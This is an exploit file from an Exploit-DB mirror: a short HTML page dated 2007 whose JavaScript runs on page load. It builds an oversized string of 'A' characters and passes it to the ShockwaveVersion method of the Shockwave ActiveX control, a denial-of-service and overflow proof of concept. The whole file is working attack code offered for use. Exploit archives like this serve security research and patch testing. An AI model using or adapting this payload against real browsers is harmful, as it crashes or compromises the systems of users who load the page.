exploit-db-mirror/exploits/windows/dos/4613.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

18 lines
No EOL
371 B
HTML

<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 768 * 768) s=s+s;
var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}
obj.ShockwaveVersion(s);
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>
# milw0rm.com [2007-11-08]